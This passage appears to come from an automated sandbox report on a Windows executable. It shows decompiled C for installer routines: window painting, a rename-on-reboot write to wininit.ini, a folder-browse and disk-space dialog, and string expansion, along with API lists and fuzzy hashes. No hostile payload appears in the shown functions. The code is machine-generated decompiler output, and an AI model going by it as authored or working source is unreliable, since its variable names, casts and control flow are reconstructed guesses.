              0x0040386e
              0x00403871
              0x00403877
              0x00403877
              0x00403896
              0x004038a7
              0x00000000
              0x004038ac
              0x00403814
              0x00403816
              0x00000000
              0x00403781
              0x00403781
              0x00403787
              0x00403791
              0x00403799
              0x004037a3
              0x004037a9
              0x004037b7
              0x004038d9
              0x004038d9
              0x00000000
              0x004038d9
              0x004037bd
              0x004037c6
              0x00403805
              0x00000000
              0x00403805
              0x004036bf
              0x004036bf
              0x004036c4
              0x00000000
              0x00000000
              0x004036ce
              0x004036de
              0x004036e3
              0x004036ea
              0x00000000
              0x00000000
              0x004036ee
              0x004036f0
              0x004036fd
              0x004036fd
              0x00403705
              0x0040370b
              0x00403733
              0x0040373b
              0x00000000
              0x0040371d
              0x0040371e
              0x00403727
              0x0040372d
              0x0040372e
              0x00000000
              0x0040372e
              0x00403729
              0x0040372b
              0x00000000
              0x00000000
              0x00000000
              0x0040372b
              0x0040370b

              APIs
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • lstrcatA.KERNEL32(00435000,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,00435400,?,00434000,00000000), ref: 0040368B
              • lstrlenA.KERNEL32(0042DBC0,?,?,?,0042DBC0,00000000,00434400,00435000,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000,00000003,00435400), ref: 00403700
              • lstrcmpiA.KERNEL32(?,.exe,0042DBC0,?,?,?,0042DBC0,00000000,00434400,00435000,0042A0A0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A0A0,00000000), ref: 00403713
              • GetFileAttributesA.KERNEL32(0042DBC0), ref: 0040371E
              • LoadImageA.USER32(00000067,00000001,00000000,00000000,?,00434400), ref: 00403767
                • Part of subcall function 00405B25: wsprintfA.USER32 ref: 00405B32
              • RegisterClassA.USER32 ref: 004037AE
              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004037C6
              • CreateWindowExA.USER32 ref: 004037FF
              • ShowWindow.USER32(00000005,00000000), ref: 00403835
              • GetClassInfoA.USER32(00000000,RichEdit20A,0042E3C0), ref: 00403861
              • GetClassInfoA.USER32(00000000,RichEdit,0042E3C0), ref: 0040386E
              • RegisterClassA.USER32(0042E3C0), ref: 00403877
              • DialogBoxParamA.USER32 ref: 00403896
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
              • API String ID: 1975747703-2904746566
              • Opcode ID: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
              • Instruction ID: 439cf4cca7a437fbaee012d0436cdd450a481f2d9ea16570e6e497c3a9acd7f8
              • Opcode Fuzzy Hash: 68b385dab8efbc3c057c942a316a407ac7ea9197ea381ea52f3d6580dbe3b634
              • Instruction Fuzzy Hash: 4861C6B16042007EE220BF629C45E273AACEB44759F44447FF941B62E2DB7DA9418A3E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
              Download Yara Rule
              C-Code - Quality: 90%
              			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42ec30;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x42e420, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42ec28;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













              0x0040100a
              0x00401039
              0x00401047
              0x0040104d
              0x00401051
              0x0040105b
              0x00401061
              0x00401064
              0x004010f3
              0x00401089
              0x0040108c
              0x004010a6
              0x004010bd
              0x004010cc
              0x004010cf
              0x004010d5
              0x004010d9
              0x004010e4
              0x004010ed
              0x004010ef
              0x004010ef
              0x00401100
              0x00401105
              0x0040110d
              0x00401110
              0x00401112
              0x00401118
              0x0040111f
              0x00401126
              0x00401130
              0x00401142
              0x00401156
              0x00401160
              0x00401165
              0x00401165
              0x00401110
              0x0040116e
              0x00000000
              0x00401178
              0x00401010
              0x00401013
              0x00401015
              0x0040101f
              0x0040101f
              0x00000000

              APIs
              • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
              • BeginPaint.USER32(?,?), ref: 00401047
              • GetClientRect.USER32 ref: 0040105B
              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
              • DeleteObject.GDI32(?), ref: 004010ED
              • CreateFontIndirectA.GDI32(?), ref: 00401105
              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
              • SelectObject.GDI32(00000000,?), ref: 00401140
              • DrawTextA.USER32(00000000,0042E420,000000FF,00000010,00000820), ref: 00401156
              • SelectObject.GDI32(00000000,00000000), ref: 00401160
              • DeleteObject.GDI32(?), ref: 00401165
              • EndPaint.USER32(?,?), ref: 0040116E
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
              • String ID: F
              • API String ID: 941294808-1304234792
              • Opcode ID: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
              • Instruction ID: 9dd9d9e9de989eb397972ae7cf78bef649c8fbd879b4abede4b5176bd3adbacf
              • Opcode Fuzzy Hash: 05bbfc508ef237e24a9817a54f4a45d084594548d285a69524b208d70469c4e1
              • Instruction Fuzzy Hash: 08419D71804249AFCB058F95DD459BFBFB9FF44314F00802AF951AA1A0C738E951DFA5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405915, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
              Download Yara Rule
              C-Code - Quality: 93%
              			E00405915(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E00405F57(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x42ecb0 =  *0x42ecb0 + 1;
						return _t20;
					}
				}
				 *0x42c230 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x42bca8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x42b8a8, "%s=%s\r\n", 0x42c230, 0x42bca8);
						_t56 = _t55 + 0x10;
						E00405BE9(_t43, 0x400, 0x42bca8, 0x42bca8,  *((intOrPtr*)( *0x42ec30 + 0x128)));
						_t20 = E0040589E(0x42bca8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405813(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405813(_t26 + 0xa, 0x4093e4);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E0040585F(_t51 + _t29, 0x42b8a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405BC7(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E0040589E(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x42c230, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















              0x0040591b
              0x00405922
              0x00405926
              0x0040592f
              0x00405933
              0x00405a72
              0x00405a72
              0x00000000
              0x00405a72
              0x00405933
              0x0040593f
              0x00405955
              0x0040597d
              0x00405988
              0x0040598c
              0x004059ac
              0x004059b3
              0x004059bd
              0x004059ca
              0x004059cf
              0x004059d4
              0x004059d8
              0x00000000
              0x00000000
              0x004059e7
              0x004059e9
              0x004059f6
              0x004059fa
              0x00405a6b
              0x00405a6c
              0x00000000
              0x00405a16
              0x00405a23
              0x00405a88
              0x00405a8f
              0x00405a36
              0x00405a36
              0x00405a38
              0x00405a41
              0x00405a4c
              0x00405a5e
              0x00405a65
              0x00000000
              0x00405a65
              0x00405a91
              0x00405a92
              0x00405a97
              0x00405a99
              0x00405aa6
              0x00405aa6
              0x00405aaa
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00405a9b
              0x00405a9b
              0x00405a9e
              0x00405aa1
              0x00405aa2
              0x00000000
              0x00405a9b
              0x00405a2e
              0x00405a33
              0x00000000
              0x00405a33
              0x004059fa
              0x00405957
              0x00405962
              0x0040596b
              0x0040596f
              0x00000000
              0x00000000
              0x0040596f
              0x00405a7c

              APIs
                • Part of subcall function 00405F57: GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
                • Part of subcall function 00405F57: GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
              • CloseHandle.KERNEL32(00000000), ref: 00405962
              • GetShortPathNameA.KERNEL32 ref: 0040596B
              • GetShortPathNameA.KERNEL32 ref: 00405988
              • wsprintfA.USER32 ref: 004059A6
              • GetFileSize.KERNEL32(00000000,00000000,0042BCA8,C0000000,00000004,0042BCA8,?,?,?,00000000,000000F1,?), ref: 004059E1
              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059F0
              • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405A06
              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,0042B8A8,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A4C
              • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A5E
              • GlobalFree.KERNEL32(00000000), ref: 00405A65
              • CloseHandle.KERNEL32(00000000), ref: 00405A6C
                • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                • Part of subcall function 00405813: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
              • String ID: %s=%s$[Rename]
              • API String ID: 3445103937-1727408572
              • Opcode ID: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
              • Instruction ID: 64f3c6dc45b3b00a74ff67058550f3a5a1124089509923db9c5fc79d761d9fea
              • Opcode Fuzzy Hash: abd3264898386bb3dbc1ebc44b2e1273f6261c7b2a899847ebec775b355f104e
              • Instruction Fuzzy Hash: 8941E131B05B166BD3206B619D89F6B3A5CDF45755F04063AFD05F22C1EA3CA8008EBE
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004042C1, Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 273stringCOMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed short _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x429870;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E0040546C(0x3fb, _t146);
					E00405E29(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E0040546C(0x3fb, _t146);
							if(E0040579B(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00405BC7(0x429068, _t146);
							_t87 = E00405F57(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00405BC7(0x429068, _t146);
								_t89 = E0040574E(0x429068);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x429068) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t159 = E00405701(0x429068) - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x429068) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404755(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								if( *((intOrPtr*)( *0x42e3fc + 0x10)) != _t158) {
									E0040473D(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x429058);
									} else {
										E00404678(_t168, 0xfffffffc, _v48, _v44);
									}
								}
								_t96 = _v8;
								 *0x42ecc4 = _t96;
								if(_t96 == _t158) {
									_v8 = E0040140B(7);
								}
								if(( *(_v32 + 0x14) & _t168) != 0) {
									_v8 = _t158;
								}
								E00403EA5(0 | _v8 == _t158);
								if(_v8 == _t158 &&  *0x42a08c == _t158) {
									E00404256();
								}
								 *0x42a08c = _t158;
								goto L53;
							}
						}
						_t185 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t118 = _a12 & 0x0000ffff;
					if(_t118 != 0x3fb) {
						L12:
						if(_t118 == 0x3e9) {
							_t152 = 7;
							memset( &_v76, 0, _t152 << 2);
							_v80 = _t166;
							_v72 = 0x42a0a0;
							_v60 = E00404612;
							_v56 = _t146;
							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
							_t122 =  &_v80;
							_v64 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E004056BA(_t146);
								_t125 =  *((intOrPtr*)( *0x42ec30 + 0x11c));
								if( *((intOrPtr*)( *0x42ec30 + 0x11c)) != 0 && _t146 == 0x434400) {
									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
										lstrcatA(_t146, 0x42dbc0);
									}
								}
								 *0x42a08c =  *0x42a08c + 1;
								SetDlgItemTextA(_t166, 0x3fb, _t146);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t165 = GetDlgItem(_t166, 0x3fb);
					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
						E004056BA(_t146);
					}
					 *0x42e3f8 = _t166;
					SetWindowTextA(_t165, _t146);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403E83(_t166);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403E83(_t166);
					E00403EB8(_t165);
					_t138 = E00405F57(0xa);
					if(_t138 == 0) {
						L53:
						return E00403EEA(_a8, _a12, _a16);
					} else {
						 *_t138(_t165, 1);
						goto L8;
					}
				}
			}












































              0x004042c1
              0x004042c7
              0x004042cd
              0x004042da
              0x004042e8
              0x004042eb
              0x004042f3
              0x004042f9
              0x004042f9
              0x00404305
              0x00404308
              0x00404376
              0x0040437d
              0x00404454
              0x0040445b
              0x0040446a
              0x0040446a
              0x0040446e
              0x00404478
              0x00404485
              0x00404487
              0x00404487
              0x00404495
              0x0040449c
              0x004044a3
              0x004044a6
              0x004044dd
              0x004044df
              0x004044e5
              0x004044ea
              0x004044ee
              0x004044f0
              0x004044f0
              0x0040450c
              0x00000000
              0x0040450e
              0x00404511
              0x0040451f
              0x00404525
              0x00404526
              0x00404529
              0x0040452c
              0x00000000
              0x0040452c
              0x004044a8
              0x004044aa
              0x004044ae
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004044b0
              0x004044b0
              0x004044bd
              0x004044c2
              0x00000000
              0x00000000
              0x004044c6
              0x004044c8
              0x004044c8
              0x004044d3
              0x004044d6
              0x004044db
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004044db
              0x00404538
              0x00404542
              0x00404545
              0x00404548
              0x0040454f
              0x0040454f
              0x00404551
              0x00404551
              0x00404556
              0x00404558
              0x00404560
              0x00404567
              0x00404569
              0x00404574
              0x00404574
              0x00404569
              0x00404584
              0x0040458e
              0x00404596
              0x004045b1
              0x00404598
              0x004045a1
              0x004045a1
              0x00404596
              0x004045b6
              0x004045bb
              0x004045c0
              0x004045c9
              0x004045c9
              0x004045d2
              0x004045d4
              0x004045d4
              0x004045e0
              0x004045e8
              0x004045f2
              0x004045f2
              0x004045f7
              0x00000000
              0x004045f7
              0x004044a6
              0x0040445d
              0x00404464
              0x00000000
              0x00000000
              0x00000000
              0x00404464
              0x00404383
              0x0040438c
              0x004043a6
              0x004043ab
              0x004043b5
              0x004043bc
              0x004043c8
              0x004043cb
              0x004043ce
              0x004043d5
              0x004043dd
              0x004043e0
              0x004043e4
              0x004043eb
              0x004043f3
              0x0040444d
              0x004043f5
              0x004043f6
              0x004043fd
              0x00404407
              0x0040440f
              0x0040441c
              0x00404430
              0x00404434
              0x00404434
              0x00404430
              0x00404439
              0x00404446
              0x00404446
              0x004043f3
              0x00000000
              0x004043ab
              0x00404399
              0x00000000
              0x00000000
              0x0040439f
              0x00000000
              0x0040430a
              0x00404317
              0x00404320
              0x0040432d
              0x0040432d
              0x00404334
              0x0040433a
              0x00404343
              0x00404346
              0x00404349
              0x00404351
              0x00404354
              0x00404357
              0x0040435d
              0x00404364
              0x0040436b
              0x004045fd
              0x0040460f
              0x00404371
              0x00404374
              0x00000000
              0x00404374
              0x0040436b

              APIs
              • GetDlgItem.USER32(?,000003FB), ref: 00404310
              • SetWindowTextA.USER32(00000000,?), ref: 0040433A
              • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
              • CoTaskMemFree.OLE32(00000000), ref: 004043F6
              • lstrcmpiA.KERNEL32(0042DBC0,0042A0A0,00000000,?,?), ref: 00404428
              • lstrcatA.KERNEL32(?,0042DBC0), ref: 00404434
              • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404446
                • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E81
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E8E
                • Part of subcall function 00405E29: CharNextA.USER32(?), ref: 00405E93
                • Part of subcall function 00405E29: CharPrevA.USER32(?,?), ref: 00405EA3
              • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
              • MulDiv.KERNEL32 ref: 0040451F
                • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                • Part of subcall function 00404678: SetDlgItemTextA.USER32(?,0042A0A0), ref: 00404731
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
              • String ID: A
              • API String ID: 2624150263-3554254475
              • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
              • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
              • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
              • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00405BE9, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 197stringCOMMON
              Download Yara Rule
              C-Code - Quality: 74%
              			E00405BE9(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed int _v24;
				signed char _v28;
				signed int _t36;
				CHAR* _t37;
				signed int _t39;
				int _t40;
				char _t50;
				char _t51;
				char _t53;
				char _t55;
				void* _t63;
				signed int _t69;
				signed int _t74;
				signed int _t75;
				char _t83;
				void* _t85;
				CHAR* _t86;
				void* _t88;
				signed int _t95;
				signed int _t97;
				void* _t98;

				_t88 = __esi;
				_t85 = __edi;
				_t63 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t36 =  *( *0x42e3fc - 4 + _t36 * 4);
				}
				_t74 =  *0x42ec58 + _t36;
				_t37 = 0x42dbc0;
				_push(_t63);
				_push(_t88);
				_push(_t85);
				_t86 = 0x42dbc0;
				if(_a4 - 0x42dbc0 < 0x800) {
					_t86 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t83 =  *_t74;
					if(_t83 == 0) {
						break;
					}
					__eflags = _t86 - _t37 - 0x400;
					if(_t86 - _t37 >= 0x400) {
						break;
					}
					_t74 = _t74 + 1;
					__eflags = _t83 - 0xfc;
					_a8 = _t74;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t86 = _t83;
							_t86 =  &(_t86[1]);
							__eflags = _t86;
						} else {
							 *_t86 =  *_t74;
							_t86 =  &(_t86[1]);
							_t74 = _t74 + 1;
						}
						continue;
					}
					_t39 =  *(_t74 + 1);
					_t75 =  *_t74;
					_t95 = (_t39 & 0x0000007f) << 0x00000007 | _t75 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t75 | 0x00000080;
					_t69 = _t75;
					_v24 = _t69;
					__eflags = _t83 - 0xfe;
					_v20 = _t39 | 0x00000080;
					_v16 = _t39;
					if(_t83 != 0xfe) {
						__eflags = _t83 - 0xfd;
						if(_t83 != 0xfd) {
							__eflags = _t83 - 0xff;
							if(_t83 == 0xff) {
								__eflags = (_t39 | 0xffffffff) - _t95;
								E00405BE9(_t69, _t86, _t95, _t86, (_t39 | 0xffffffff) - _t95);
							}
							L41:
							_t40 = lstrlenA(_t86);
							_t74 = _a8;
							_t86 =  &(_t86[_t40]);
							_t37 = 0x42dbc0;
							continue;
						}
						__eflags = _t95 - 0x1d;
						if(_t95 != 0x1d) {
							__eflags = (_t95 << 0xa) + 0x42f000;
							E00405BC7(_t86, (_t95 << 0xa) + 0x42f000);
						} else {
							E00405B25(_t86,  *0x42ec28);
						}
						__eflags = _t95 + 0xffffffeb - 7;
						if(_t95 + 0xffffffeb < 7) {
							L32:
							E00405E29(_t86);
						}
						goto L41;
					}
					_t97 = 2;
					_t50 = GetVersion();
					__eflags = _t50;
					if(_t50 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42eca4;
						if( *0x42eca4 != 0) {
							_t97 = 4;
						}
						__eflags = _t69;
						if(_t69 >= 0) {
							__eflags = _t69 - 0x25;
							if(_t69 != 0x25) {
								__eflags = _t69 - 0x24;
								if(_t69 == 0x24) {
									GetWindowsDirectoryA(_t86, 0x400);
									_t97 = 0;
								}
								while(1) {
									__eflags = _t97;
									if(_t97 == 0) {
										goto L29;
									}
									_t51 =  *0x42ec24;
									_t97 = _t97 - 1;
									__eflags = _t51;
									if(_t51 == 0) {
										L25:
